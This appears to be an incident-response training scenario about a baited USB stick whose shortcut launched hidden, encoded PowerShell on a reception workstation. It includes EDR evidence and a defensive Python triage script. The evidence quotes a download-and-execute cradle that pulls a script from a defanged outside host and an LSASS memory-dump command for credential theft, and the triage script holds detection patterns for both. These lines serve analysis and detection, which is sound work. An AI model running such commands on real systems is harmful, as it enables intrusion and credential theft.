Suspicious USB Device
Difficulty: easy
Asset level: Medium
Automated alert from EDR (rule USB-LNK-EXEC-02).
Workstation RECEPT-WS-01 (reception desk, ground floor) executed a Windows shortcut (.lnk) from a removable USB drive at 16:03:17 UTC. The shortcut launched powershell.exe with an encoded command. Process tree:
explorer.exe → powershell.exe -nop -w hidden -enc <base64>
The reception staff member tells us she found a USB stick in the lobby labeled "Q2 Bonus — do not open" earlier today and plugged it in to "see who it belonged to." She has not used the workstation for any other task since.
Please respond.
— EDR / Endpoint Security
Evidence
EDR detection + USB enumeration (RECEPT-WS-01)
# Removable media event
Device: USB Mass Storage VID_0951&PID_1666 (Kingston)
Volume label: Q2_BONUS
First seen: 2026-04-19 16:01:42 UTC on RECEPT-WS-01
Files: Q2_Bonus_List.lnk, .hidden\stage1.ps1, README.txt
# LNK target (resolved)
target: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe
args: -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB... (base64, decodes to IEX downloader)
# Decoded stage1 (preview)
$u = "https://cdn-doc-share[.]xyz/q2/s.ps1"
IEX (New-Object Net.WebClient).DownloadString($u)
# also attempts: rundll32 comsvcs.dll MiniDump <lsass pid> %TEMP%\l.dmp full
# Network activity from RECEPT-WS-01 (last 30 min)
16:03:18 TLS RECEPT-WS-01 → cdn-doc-share[.]xyz:443
16:03:19 EDR blocked outbound to cdn-doc-share[.]xyz (low-rep, 8d-old domain)
# AV / VirusTotal lookup on stage1.ps1
SHA256 a14f..be07 → 41/72 (PowerShell.Downloader.*)
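The evidence above hinges on two things a responder has to do by hand otherwise: decode the `-enc` argument (PowerShell's `-EncodedCommand` takes base64 of UTF-16LE, not of ASCII) and pick out the indicators that make this a priority case (the `IEX ... DownloadString` cradle, the `comsvcs.dll MiniDump` LSASS dump, the hidden window and `-nop` flags, and the removable-media launch chain). The following is an added triage helper written for this write-up, not part of the scenario or the EDR product; the event schema (`parent`, `image`, `cmdline`, `removable_media`) is an assumption, and the sample event is constructed by re-encoding the decoded stage1 preview shown above.

```python
import base64
import binascii
import re
from typing import Optional

# Constructed sample: the decoded stage1 preview from the alert, with the
# "<lsass pid>" placeholder kept as the page gives it.
STAGE1_PREVIEW = (
    '$u = "https://cdn-doc-share[.]xyz/q2/s.ps1"\n'
    "IEX (New-Object Net.WebClient).DownloadString($u)\n"
    "rundll32 comsvcs.dll MiniDump <lsass pid> %TEMP%\\l.dmp full\n"
)

# PowerShell accepts -e, -ec, -enc and -encodedcommand; all mean the same thing.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicators matched against the outer command line plus the decoded script.
INDICATORS = {
    "download_cradle": re.compile(
        r"IEX\s*\(New-Object\s+Net\.WebClient\)\.DownloadString", re.IGNORECASE),
    "lsass_minidump": re.compile(r"comsvcs\.dll\s*,?\s*MiniDump", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE),
}
URL = re.compile(r"https?://[^\s\"']+")


def encode_powershell_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it
    (UTF-16LE, then base64). Used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -enc payload from a command line, or None if there is
    none or it is not valid UTF-16LE base64 (truncated captures are common)."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage_process_event(event: dict) -> dict:
    """Decode the command line, collect indicators and IOCs, and assign a
    priority. Priority is 'high' when the script fetches code or dumps LSASS,
    'medium' for any other indicator, else 'low'."""
    decoded = decode_encoded_command(event.get("cmdline", ""))
    haystack = event.get("cmdline", "") + "\n" + (decoded or "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]

    # The launch chain behind rule USB-LNK-EXEC-02: Explorer (the user
    # double-clicking a shortcut) spawning PowerShell from removable media.
    if (event.get("removable_media")
            and event.get("parent", "").lower() == "explorer.exe"
            and "powershell" in event.get("image", "").lower()):
        hits.append("usb_lnk_powershell_launch")

    if {"download_cradle", "lsass_minidump"} & set(hits):
        priority = "high"
    elif hits:
        priority = "medium"
    else:
        priority = "low"

    return {
        "decoded": decoded,
        "indicators": hits,
        "iocs": URL.findall(decoded or ""),  # stays defanged as written
        "priority": priority,
    }


# Constructed event mirroring the alert's process tree.
SAMPLE_EVENT = {
    "host": "RECEPT-WS-01",
    "parent": "explorer.exe",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "cmdline": "powershell.exe -nop -w hidden -enc "
               + encode_powershell_command(STAGE1_PREVIEW),
    "removable_media": True,
}

if __name__ == "__main__":
    result = triage_process_event(SAMPLE_EVENT)
    print("priority:", result["priority"])
    print("indicators:", ", ".join(result["indicators"]))
    print("iocs:", result["iocs"])
    print("decoded:\n" + (result["decoded"] or "<none>"))
```

The decoded script, the IOC list and the indicator names are what go into the ticket: the URL feeds the block list the EDR already applied, and `lsass_minidump` is the reason credential reset for anyone who logged on to RECEPT-WS-01 is worth considering even though the host holds no privileged data locally.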
Affected asset
- Name: RECEPT-WS-01
- Type: Reception desk Windows workstation (shared, no privileged data stored locally)
- Owner: Office Operations
- Level: Medium